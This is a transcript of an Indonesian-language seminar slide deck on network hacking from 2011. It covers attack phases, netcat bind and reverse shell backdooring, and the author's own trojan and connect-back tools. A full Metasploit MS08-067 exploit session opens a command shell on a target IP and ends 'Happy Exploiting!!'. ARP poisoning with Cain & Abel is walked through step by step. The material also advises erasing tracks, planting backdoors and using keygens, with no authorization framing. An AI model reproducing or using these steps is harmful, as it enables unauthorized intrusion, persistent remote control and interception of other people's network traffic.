NetWork Hacking

41
NetWork Hacking Hacking Secara umum Pengertian hacking secara umum telah banyak di jelaskan di internet maupun oleh saya sendiri pada beberapa pertemuan . Hacking merupakan tindakan meng oprek komputer , baik secara hardware maupun secara software . Jadi orang yang suka mengutak- atik komputer baik software maupun hardware (over Clock) bisa di bilang adalah seorang hacker. Tetapi kemudian media ,baik cetak maupun elektronik, selalu mengaitkan hacker dengan tindakan kejahatan. Seperti pencurian kartu kredit, pencurian akun maupun tindakan destruktif semacam deface website. Namun pada dasarnya, seorang hacker adalah orang yang berusaha memahami sebuah system secara mendalam. Untuk pertemuan kali ini saya akan membedakan antara webhacking dan network hacking, meskipun kemudian perbedaan keduanya menjadi semakin tipis dengan banyaknya perkembangan di dunia digital.

Transcript of NetWork Hacking

Page 1: NetWork Hacking

NetWork Hacking

Hacking Secara umum

Pengertian hacking secara umum telah banyak di jelaskan di internet maupun oleh saya sendiri pada beberapa pertemuan . Hacking merupakan tindakan meng oprek komputer , baik secara hardware maupun secara software . Jadi orang yang suka mengutak- atik komputer baik software maupun hardware (over Clock) bisa di bilang adalah seorang hacker. Tetapi kemudian media ,baik cetak maupun elektronik, selalu mengaitkan hacker dengan tindakan kejahatan. Seperti pencurian kartu kredit, pencurian akun maupun tindakan destruktif semacam deface website. Namun pada dasarnya, seorang hacker adalah orang yang berusaha memahami sebuah system secara mendalam.

Untuk pertemuan kali ini saya akan membedakan antara webhacking dan network hacking, meskipun kemudian perbedaan keduanya menjadi semakin tipis dengan banyaknya perkembangan di dunia digital.

Hacker dan hacking identik dengan pengrusakan web atau data dalam komputer target. Namun pada kenyataanya hacking sendiri mempunyai cakupan yang lebih luas daripada itu. Hacking menggabungkan pengetahuan programming dan networking untuk mencapai tujuan

Page 2: NetWork Hacking

Hacker sendiri menurut pandangan public dan media adalah orang/individu yang mempunyai kemampuan sedemikian sehingga dapat menembus system pertahanan sebuah system dan menguasai system tersebut untuk di gunakan sebagai kesenangan ataupun untuk keuntungan si hacker.

Namun pada kenyataanya dengan kemampuan hacker yang sedemikian, hacker mampu menemukan lubang/hole/bug pada sebuah system operasi maupun aplikasi di dalamnya, sehingga hacker tersebut juga mampu menutup kelemahan ini agar system tersebut dapat menjadi lebih aman. Jadi apakah hacker itu ibliz??ataukah malaikat?? Terlepas dari definisi hacker , yang pasti hacker mempunyai kemampuan teknis jaringan, programming dan system operasi dan mampu memadukannya untuk mencapai tujuan hacker tersebut.

Menurut beberapa ahli IT hacker di bagi menjadi 3 bagian besar yaitu:

Hacker Whitehat (topi putih/real hacker)Hacker ini merupakan hacker yang baik,

dimana jika dia menemukan suatu kelemahan/lubang/bug pada sebuah system maupun aplikasi dengan segera hacker ini segera memberi kabar kepada pemilik system

atau pembuat aplikasi yang bersangkutan dan dengan kemampuannya, hacker tersebut mencoba memperbaiki lubang yang di temukannya. Developer/ pembuat aplikasi yang

Page 3: NetWork Hacking

banyak dipakai oleh public juga di golongkan sebagai whitehat. Salah satu contoh

orang yang di akui dunia sebagai whitehat hacker adalah Linus torvalds pencipta system

operasi Linux.

Hacker Blackhat(topi hitam/cracker/hacker jahat)Hacker type ini merupakan hacker vandals atau

dalam arti hacker ini mencoba masuk ke sebuah system secara illegal. Dimana jika hacker

ini menemukan sebuah kelemahan/bug maka dengan segera hacker tersebut

memanfaatkannya untuk kepentingan dirinya baik untuk di gunakan untuk kejahatan maupun untuk kepentingan lainnnya.

Hacker greyhat(topi abu-abu)

Hacker type ini merupakan orang yang mencoba memberitahukan kelemahan yang di temukkannya pada pemilik system ataupun developer software yang terkena bug, namun selain itu hacker type ini juga memanfaatkan kelemahan ini untuk keuntungan dirinya sendiri.

Saya sendiri tidak pernah membeda-bedakan hacker-hacker ini, karna pada kenyataannya hacker-hacker ini baik yang di anggap jahat maupun baik, semuanya mampu memberikan sumbangan bagi

Page 4: NetWork Hacking

perkembangan di dunia IT. Melalui tool-tool maupun software-software buatan mereka, dan menurut saya sendiri hacker sejati itu bukan di nilai dari tindakannya tetapi lebih kepada kemampuannya seperti kemampuan programming, networking maupun pengetahuannya tentang system operasi. Dan hacker yang hanya bisa memakai tool dan banyak omong itulah yang saya sebut “hacker-hacker an”

Beberapa kemampuan yang mampu di lakukan oleh orang-orang seperti ini antara lain:

HackerHacker secara umum yang mempunyai

pengetahuan mendasar tentang sebuah system operasi, networking dan programming secara umum. Kemampuan ini dapat di manfaatkannya untuk menemukan kelemahan di dalam sebuah system komputer baik kelemahan di aplikasi(web maupun desktop) atau di dalam system operasi nya itu sendiri, dan dengan kelemahan yang di temukannya , hacker dapat memanfaatkannya untuk menembus system pertahanan sebuah system komputer.

ReverserOrang yang bekerja mencari kelemahan

algoritma di dalam software-software komersial untuk kemudian membuat software “versi dirinya” agar software itu bisa di gunakan secara gratis. Kemampuan dasar reverser adalah programming bahasa tingkat rendah semacam C dan ASM

Page 5: NetWork Hacking

sehingga memungkinkan dirinya memahami algoritma “Product key” di dalam sebuah software komersial, setelah dapat memahami algoritma “Product key” maka dengan kemampuannya reverser mampu membuat sebuah KeyGen, dimana KeyGen ini sering kita pake (sebagai pengguna aktif windows, tentu saja agar kita tidak perlu membayar sebuah aplikasi komersial . KeyGen adalah produk para reverser dengan kemampuan yang menakjubkan

PhreakerPhreaker adalah orang yang mencari kelemahan

di dalam system telekomunikasi baik device/alat telekomunikasi ataupun system perusahaan telekomunikasi itu sendiri(TELKOM??) dimana dengan kemampuannya ini, phreaker berusaha memakai layanan telekomunikasi secara gratis . Jika anda tahu bluebox, maka bluebox adalah salah satu produk para phreaker ini.

VXer(virus maker)VXer atau VirusMaker adalah orang yang

mempunyai kemampuan mendasar tentang system operasi dan pemrogramman, dimana ilmu-ilmu ini di manfaatkannya untuk membuat sebuah program komputer yang dapat mengubah jalannya suatu system ataupun merusakannya. Salah satu contoh virus yang terkenal adalah brontok,Sasser,Beagle,Sality, Alman. Selain virus juga banyak type malware lain yang mampu di buat oleh VXer ini seperti worm,Trojan,spyware,botnet dll.

Page 6: NetWork Hacking

CarderCarder adalah orang yang mempunyai

kemampuan untuk mengambil data kartu kredit orang secvara illegal dan menggunakannya untuk kepentingan pribadinya, seperti membelanjakannya untuk membeli software ataupun barang-barang kesukaannya.

Webhacking pernah saya bahas pada seminar sebelumnya, jadi kali ini saya akan membahas network hacking , tetapi tentu saja step-step nya masih sama dengan web hacking

2.Fasa-fasa hacking

Sebelum hacker mampu menembus dan menguasai suatu system maka hacker tersebut perlu mengenali system target terlebih dahulu, artinya ada tahapan-tahapan khusus yang di lakukan oleh hacker sebelum melakukan hacking ke dalam system target.

Menurut saya berikut adalah tahapan-tahapan hacking yang di lakukan sebelum hacker menguasai sebuah target:

1.Reconnaissance (footprinting)2.Vulnerability Exploitation and Access.

Page 7: NetWork Hacking

3.Privilege Escalation & owning the box.4.Erase tracks.5.Maintaining access.6. DDOS

Tentu saja tahapan-tahapan ini tidak harus kita ikuti,karna hacking sendiri adalah sebuah seni. Kapan kita memulai apa dalam tahap-tahap itu,bisa kita lakukan untuk mendapatkan akses ke system target

Reconnaissance (footprinting).

FootPrinting merupakan tahap dimana hacker mencoba mengumpulkan informasi sebanyak mungkin.Port target, service yang di jalankan oleh target,OS target, nama pemilik system , IP target, DNS zone transfer, whois, search engine, juga di perlukan dalam tahap ini.Dalam tahap ini juga ada beberap teknik menarik yang “NON teknis” semacam:

- Dumpster diving:Mengorek sampah guna mencari data-data yang

berguna untuk masuk ke system target- Social EngineeringMenipu user sah system agar di peroleh iinformasi sebanyak mungkin- Shoulder sniffingMengintip password dari user yang sah

Page 8: NetWork Hacking

Dalam teknik Reconaisance ini hacker bisa menggunakan tool scanner yang sangat terkenal yaitu nmap, dimana dengan nmap kita bia mengetahui port-port yang terbuka pada system target. Beberapa service yang berjalan pada system , default nya memakai port-port:

Port | Service ---------------------------------------------------------------------

21 FTP (File transfer protocol)22 SSH(Secure Shell)23 Telnet80 Webserver3306 MySQL

Contoh penggunaan nmap untuk men-scan system target

Ini adalah contoh penggunaan Nmap untuk mengetahui OS dari sebuah system:

Page 9: NetWork Hacking

Dan ini adalah sebuah contoh penggunaan nmap untuk mencari system yang membuka port tertentu :

Vulnerability Exploitation And access

Dalam tahap ini hacker mencoba meng-exploitasi terhadap bug yang kemungkinan di miliki oleh service target. Dan jika pada salah satu teknik exploitation ini si hacker berhasil menembus pertahanan system target, maka dengan segera hacker telah mendapatkan akses ke dalam system target.Bug pada web yangs erring di exploitasi oleh hacker adalah SQL injection,RFI,LFI dll. Sedangkan pada service lain selain webserver(port 80) maka hacker terkadang memakai exploit service, semacam service SMB(sharing) pada windows yang banyak bug di dalamnya.

Privilege Escalation & owning the box

Tahap dimana hacker mencari dan mendapatakan password Admin/root dan menguasai system lebih luas.Dimana dengan penguasaan yang lebih tinggi inilah hacker mulai mampu melihat semua data di dalam server target. Dengan hak akses tertinggi

Page 10: NetWork Hacking

inilah hacker sudah bisa mengendalikan server target sepenuhnya.

Erase tracks

Setelah akses root/admin terkuasai ,maka hacker perlu menghapus jejak yang mungkin mengarah pada dirinya,atau memungkinkan admin mengtahui jejak hacker dalam systemnya

Maintaining access

Penanaman backdoor dimana ini merupakan pintu masuk bagi hacker, jika suatu saat akun root/admin yang di kuasai hacker sudah di ketahui. Dan backdoor ini juga di gunakan untuk masuk hacker sehingga hacker tidak perlu meng-explotasi system lagi.

DOS/DDOS(Distributed/Denial Of Service)

Tindakan ini di lakukan oleh hacker vandals jika semua cara masuk ke dalam system sudah tidak memungkinkan.Dengan serangan DDOS ini,admin atau pemilik system dengan terpaksa mematikan system mereka . Serangan DOS lebih memanfaatkan kelemahan pada system target, contoh nyata dalam hal ini adlah bug pada WINDOWS XP Profesional, dimana dengan

Page 11: NetWork Hacking

mengirimkan paket yang besar dapat menyebabkan system WINDOWS ini menjadi crash. Sedangkan untuk serangan DDOS, hacker sebelumnya sudah mempunyai beberapa system yang telah di hack, dan system-system ini telah di pasangi Botnet yang mudah di kendalikan, Botnet ini sendiri biasanya hanya sebuah program kecil yang akan menunggu perintah dari si hacker untuk melakukan serangan Flooding ke system target lainnya.

NetWork Hacking

Untuk network hacking kali ini, saya akan memberikan beberapa materi yang saya bedakan dengan webhacking, meskipun dalam perkembangan teknologi informasi, maka network hacking dan webhacking hamper tidak jauh berbeda, contohnya adalah banyaknya personal yang menginstall software webserver sendiri di komputer ataupun di laptop pribadinya, yang kemudian memungkinkan seorang attacker menyerang komputer target via LAN dengan memanfaatkan bug web pada service webserver tersebut.

Network Hacking bisa menjadi masalah serius saat yang di serang adalah jaringan sebuah institusi penting. Seorang hacker mampu melakukan serangan pada network yang lemah dengan memanfaatkan beberapa kelemahan berikut:

Page 12: NetWork Hacking

- Kelemahan pada webserver yang berjalan pada jaringan (webhacking/ gak akan saya bahas sekarang)

- Kelemahan OS pada jaringan (terutama sekali kelemahan yang bisa di akses secara remote, misalnya bug pada service DCOM milik windows yang di manfaatkan oleh hacker )

- Kelemahan pada sisi protokol jaringan (akan kita bahas ) dengan potensi serangan DOS, MITM (Man In The Middle) Attack dll.

- Kelemahan pada sisi user (weak password, Social Engineering dan lain- lain)

- Dan lain-lain

Kali ini akan saya bahas beberapa teknik yang saya jelaskan di atas. Enjoy the show!

What is Port , Bind Port??, Reverse Connect??

Di dunia hacking n cracking, ada banyak istilah aneh ..Yaitu yang akan saya jelaskan sekarang adalah Port, bind dan reverse bind. Baik bind maupun reverse, keduanya adalah teknik yang umum di gunakan oleh hacker dalam backdooring (pintu belakang)

~PORT

Port yang saya utarakan di sini adalah port virtual dan bukan port fisik seperti port USB, ataupun port printer(LPT), port virtual ini adalah port yang terdapat di dalam system operasi dan program-

Page 13: NetWork Hacking

program komputer yang memungkinkan penggunaan 2 komputer dapat saling bertukar

data,Port itu ibarat pintu yang bisa di buka agar data dapat lewat sedemikian sehingga pertukaran data anatara 2 system komputer dapat terjadi. Contoh port – port yang umum di gunakan adalah port 80, yang di gunakan oleh webserver semcam apache (XAMPP), IIS sehingga server tersebut bisa melayani client yang membuka koneksi melalui browser nya. Nah dengan adanya webserver maka data-data amsuk ke server melalui port 80 untuk kemudian melalui port 80 ini pula webserver memberikan jawaban atau hasil berupa halaman web kepada client yang mengaksesnya.Dengan adanya port yang terbuka pada sebuah system , maka memungkinkan 2 komputer atau device dapat saling bertukar data.

Page 14: NetWork Hacking

~ BIND PORT

Bind port merupakan kata yang khas di gunakan dalam dunia cracking/hacking,Bind secara bahasa bisa di artikan “mengikat” dimana maksud dari bind port ini adalah pengikatan system pada port tertentu, biasanya system yang terbuka port nya ini adalah system yang telah di kuasai. Bind port artinya kita akan memaksa membuka port tertentu pada system target(entah bagaimana caranya, baik melalui social engineering, maupun teknik lainnya), nt anda akan mengerti bedanya dengan REVERSE. Contoh penggunaan bind port adalah Trojan, dimana jika sebuah program Trojan di jalankan di sebuah system, maka Trojan ini akan membuka port yang telah di tentukan oleh hacker pembuat Trojan ini. Nah, melalui port yang terbuka oleh Trojan ini maka hacker bisa dengan mudah menguasai system target. Untuk praktek kali ini kita akan menggunakan NetCat dan Trojan buatan vires , NetCat sendiri adalah salah satu tool hacker yang wajib di miliki dan di kuasai . Netcat di sebut sebagai salah satu tool andalan para hacker dalam hal backdooring, karna kemudahan dan fitur-fiturnya yang sangat efektif dalam backdooring ini.Oke kita mulai saja teknik backdooring dengan teknik BIND

Silahkan buka cmd dan pindah ke direktori dimana netcat anda tersimpan, contohnya dan jalankan netcat nya dalam modus Listen, dimana mode ini artinya, kita akan membuka port(listen) dan menunggu adanya koneksi dari client lain. Di sini kita menambahkan –e cmd.exe, dimana maksud

Page 15: NetWork Hacking

dari opsi ini adalah execute cmd.exe, dan semua proses cmd.exe akan di alihkan melalui port 13337 , yang artinya jika ada yang meng koneksi kan ke netcat yang listen ini, maka client tersebut akan mendapatkan command shell dari system

Nah dari netcat lain, kita bisa connect melalui port 13337 dan hasilnya sebagai berikut:

Page 16: NetWork Hacking

Terlihat bahwa netcat sudah saling terkoneksi dan lihat pula directory pada netcat yang berubah, karna directory yang di tampilkan adalah directory dimana netcat yang listen dijalankan. , dengan begini attacker sudah bisa menguasai cmd pada system target. Testing selanjutnya, kita akan menggunakan Trojan buatan saya sendiri, yang lebih stealth (tanpa window), sehingga akan lebih menguntungkan attacker dalam menyembunyikan trojannya .

Di dalam paket program ada 2 file, satu file server(backdoor) dan satu file controllernya atau bagian client nya, yang di pegang oleh hacker, jika bagian servernya di jalankan di system target, maka hacker bisa menggunakan program clientnnya, untuk mengendalikan system target , seperti berikut:

Page 17: NetWork Hacking

Jika setelah anda menjalankan program client nya, anda mendapatkan pesan“vires-vitri Greetings………..”, maka anda telah berhasil menguasai system tersebut

Di atas sudah di jelaskan bagaimana BIND itu, dimana BIND itu bisa di gambarkan dengan seorang pencuri yang sengaja membuka pintu rumah orang dengan tujuan, pada malam hari nya pencuri tersebut bisa masuk dari pintu itu dan mulai mencuri, nah konsepnya sama, attacker dengan cara menipu target, dimana dengan tipuan ini bermaksud agar target menjalankan program Trojan, dan Trojan inilah yang akan membuka port , sehingga bisa di kendalikan oleh attacker .

Kelemahan teknik BIND/LISTEN adalah, bahwa jika system target terpasang firewall, maka firewall ini tidak akan mengijinkan adanya aplikasi yang membuka port yang mencurigakan, sehingga terkadang ada beberapa system yang tidak bisa di pasangi Trojan karna adanya firewall ini , nah untuk mengatasi ini, hacker punya jalan lain yaitu REVERSE CONNECT

~ REVERSE CONNECT

Nah, kalo tadi reverse connect di gambarkan sebagai orang yang berpura-pura bertamu ke rumah korban dan membuka pintu belakang rumah korban, maka reverse connect akan berbeda konsep, dimana reverse connect bisa di gambarkan sebagai seorang pencuri yang pandai menghipnotis korbannya, sedemikian sehingga korbannya ini akan mudah di

Page 18: NetWork Hacking

kendalikan oleh pencuri agar si korban mencuri barangnya sendiri dan memberikannya kepada pencuri itu . Kalo bingung dengan penjelasan saya,

mari kita

praktekkan dengan netcat

Nah, berbeda dengan Trojan(bind/listen) yang membuka port di sisi target, maka sekarang yang akan membuka port adalah si attacker , dengan perintah pada netcatnya:

Nah, pada sisi target, maka perintah netcatnya akan seperti berikut

Page 19: NetWork Hacking

Nah, dengan begini server target bisa di kuasai tanpa ada halangan dari firewall, karna pada sisi target port tidak pernah terbuka . Nah sekarang kita testing juga connectback (reverse) buatan vires , Yang seperti biasa, tersedia 2 file, Dimana file cbServer adalah bagian yang di jalankan oleh attacker, dengan cbserver ini maka, attacker akan membuka port pada system nya, dan menunggu adanya koneksi dari system target

dan bagian cbClient , adalah file yang di jalankan di system target, dan jika cbClient di jalankan maka di sisi hacker tampilannya akan berubah menjadi

Page 20: NetWork Hacking

Artinya, sudah ada koneksi dari target, dan hacker siap mengendalikan system target . Karna connectback berbeda dengan Trojan yang membuka port maka connectback hamper lebih susah di deteksi oleh firewall, karna tidak membuka port manapun , namun agar program backdoor yang di tanam di system target bisa melakukan koneksi ke

Page 21: NetWork Hacking

system nya hacker, maka backdoor tersebut harus tau IP dari attacker, nah untuk setting ini terletak pada file “vires.neth” yang letaknya 1 direktori dengan cbclient Dimana isi dari vires.neth ini adalah ipnya hacker yang sudah menunggu koneksi dari backdoor connectback ini

Untuk bahasan selanjutnya kita akan membahas bagaimana seorang cracker meng exploitasi kelemahan pada OS untuk mendapatkan akses ke dalam system tersebut

Network Hacking dengan memanfaatkan Bug pada OS

Akan saya tekankan terlebih dahulu bahwa SEMUA OS MEMPUNYAI BUG, bedanya adalah bagaimana eksploitasi nya, antara OS windows dan OS berbasis UNIX, maka OS windows lebih banyak bug yang bisa di manfaatkan oleh hacker, contoh nyata nya adalah worm stuxnet yang memanfaatkan bug pada OS windows, yang memungkinkan worm ter eksekusi secara otomatis tanpa campur tangan user. Untuk kali ini saya akan bahas bug yang bisa di akses secara remote, yaitu bug SMB NETAPI yang terdapat pada OS Windows XP dari SP1 sampai SP3 Dimana dengan bug ini, hacker bisa mengakses command shell pada komputer windows tersebut dan menguasai nya. Untuk praktek kali ini saya akan menggunakan kumpulan exploit , yaitu framework METASPLOIT

Page 22: NetWork Hacking

Silahkan di buka metasploitnya, begini tampilan metasploit di laptop saya:

Oke, untuk kali ini saya akan menggunakan bug NETAPI, kalo msf sudah ready(lihat gambar di atas), silahkan lakukan nmap tetapi kita akan mencari system yang membuka port 445, dimana port inilah yang di gunakan oleh NETAPI oleh windows, pada beberapa versi windows dan kalau belum di patch maka melalui port 445 dan bug NETAPI, kita bisa masuk ke dalam system tersebut.

Page 23: NetWork Hacking

Jika sudah menemukan IP yang aktif dengan port 445 maka silahkan ketikkan perintah ini:(tulisan yang di awali ++ adalah catetan dari vires, jangan ikut di ketik )

Use windows/smb/ms08_067_netapi ++ gunakan exploit bug netapiSet payload windows/shell/bind_tcp++ set payload yang akan di pakai, yaitu bind TCPShow options++ melihat parameter yang perlu di masukkan

Set rhost 192.168.9.12++ tentukan ip targetSet lport 13337++ tentukan port yang akan di gunakan untuk bind exploitExploit++ do it NOW brothers n sisters …

Page 24: NetWork Hacking

Untuk gambarannya, lihat gambar di bawah ini:

Jika anda melihat pesan “Command Shell session …..opened ….”Maka anda sudah mendapatkan akses ke system tersebut, dan coba tebak, anda sudah bisa melihat

Page 25: NetWork Hacking

lihat data dan semua perintah system bisa anda pakai . Happy Exploiting!!Perintah komplitnya jadi seperti ini:

msf > use windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > set payload windows/shell/bind_tcppayload => windows/shell/bind_tcpmsf exploit(ms08_067_netapi) > show options

Module options:

Name Current Setting Required Description ---- --------------- -------- ----------- RHOST yes The target address RPORT 445 yes Set the SMB service port SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/shell/bind_tcp):

Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC thread yes Exit technique: seh, thread, process, none LPORT 4444 yes The listen port RHOST no The target address

Page 26: NetWork Hacking

Exploit target:

Id Name -- ---- 0 Automatic Targeting

msf exploit(ms08_067_netapi) > set rhost 192.168.9.12rhost => 192.168.9.12msf exploit(ms08_067_netapi) > set lport 13337lport => 13337msf exploit(ms08_067_netapi) > exploit

Saya akan memberikan contoh lain BUG pada OS windows, dan masih merupakan bug baru (bug yang di manfaatkan oleh stuxnet ), saya bahkan sudah membuat worm dengan memanfaatkan bug ini, namun tidak pernah saya publish (high responsibility), namun akan saya berikan gambarannya nanti. Dengan kemampuan programming dan networking anda, saya yakin anda punya kesempatan untuk membuat hal yang serupa dengan yang saya buat . Sekali saya tegaskan bahwa hacking itu seni yang menggabungkan kemampuan programming dan networking .

Network Hacking dengan memanfaatkan Kelemahan pada sisi protokol jaringan

Page 27: NetWork Hacking

Untuk kali ini saya akan menjelaskan bagaimana protocol jaringan bekerja dan dengan mengetahui pengetahuan ini, maka kita bisa mengetahui bagaimana hacker bisa memanfaatkannya

~ARP(Address Resolution Protocol)

ARP merupakan protocol jaringan yang memungkinkan pengubahan dari IP ADDRESS menjadi MAC ADDRESS, lalu apa gunanya??Baik, sebagai pengetahuan anda saya akan memberikan gambaran seperti ini:

Page 28: NetWork Hacking

Jadi, ketika 2 device/komputer akan saling bertukar data di jaringan, maka yang perlu di lakukan oleh komputer pertama (komputer A) yang akan berkomunikasi adalah mengetahui MAC ADDRESS dari komputer lain(komputer B) yang akan di ajak bertukar data, Nah, karna pada dasarnya komputer hanya mengetahui IP ADDRESS dari komputer yang akan di hubunginya (dalam hal ini komputer B), maka komputer A akan mengirimkan ARP REQUEST ke dalam jaringan. Untuk ARP REQUEST sendiri , mempunyai sifat broadcast, atau menyebar di jaringan, yaitu dengan begini, semua komputer yang ada di jaringan akan menerima paket ARP REQUEST ini. Nah, ARP REQUEST ini bisa di gambarkan sebagai analogi orang yang berteriak di dalam kelas “Hey, IP 192.168.0.2, berapa MAC kamu??saya mau tukar data, ini MAC saya 11:22:33:44:55:66 dan Ip saya 192.168.0.3” karna bersifat broadcast, maka semua komputer menerima paket ini, dan karna komputer B mempunyai MAC yang cocok dengan yang ditanyakan, maka komputer B akan membalas ke MAC 11:22:33:44:55:66 dengan ARP REPLY , dimana sifat ARP REPLY kebalikan dari broadcast, yaitu UNICAST, artinya, ARP REPLY ini khusus di tujukan kepada MAC ADDRESS komputer A. yang analoginya adalah seperti ini:

“HEY MAC 11:22:33:44:55:66, saya 192.168.0.2 dan MAC saya adalah 22:33:44:55:66:77”

Nah, karna komputer A sudah menerima ARP REPLY, maka komputer A akan meng update ARP

Page 29: NetWork Hacking

CACHE di dalam systemnya, dimana ARP CACHE ini akan berisi daftar

Ip.address Mac Address

Jadi di dalam arp cache komputer A, akan menjadi seperti ini:

192.168.0.2 22:33:44:55:66:77

Sedangkan arp cache di komputer B akan menjadi seperti ini:

192.168.0.3 11:22:33:44:55:66

Karna komputer A dan komputer B, sudah saling mengetahui Ip dan MAC ADDRESS masing-masing, maka mereka bisa mulai bertukar data (mungkin hanya sebuah PING)

~ The Trouble maker!

Anda sekarang mengetahui bagaimana ARP bekerja, celakanya, ARP ini bisa di manipulasi oleh hacker untuk tujuan-tujuan jahat , dimana dengan memanipulasi ARP REPLY maka hacker bisa melakukan pengalihan traffic jaringan dan juga aksi DOS (Denial Of Service)

~ Pengalihan Traffic jaringan

Page 30: NetWork Hacking

Untuk pengalihan traffic jaringan ini, maka kita perlu memakai tool yang bernama cainabel

Cara kerja cainabel dalam mengalihkan traffic jaringan adalah sebagai berikut:

Hacker dengan tool cainabel mengirimkan packet ARP REPLY ke komputer A dengan data “IP gateway dan MAC ADDRESS 33:44:55:66:77:88(mac hacker)” dan mengirimkan ARP REPLY ke gateway dengan data “IP komp A dan MAC ADDRESS 33:44:55:66:77:88”

Dengan begini,komp A menganggap mac 33:44:55:66:77:88 adalah mac address gateway dan gateway menganggap mac 33:44:55:66:77:88 adlah mac komputer A, kalo sudah begini, semua traffic

Page 31: NetWork Hacking

dari A ke gateway telah teralihkan ke komputer hacker

~penggunaan CainAbel

1. mengaktifkan program sniffer

2. mengetahui ip2 yang ada di jaringan3. mengaktifkan menu APR

Page 32: NetWork Hacking
Page 33: NetWork Hacking

4. Memilih ip yang akan di poison

Page 34: NetWork Hacking

POISONED!!!

Page 35: NetWork Hacking

Program lain: NetCut:

Selesai, vires, 2011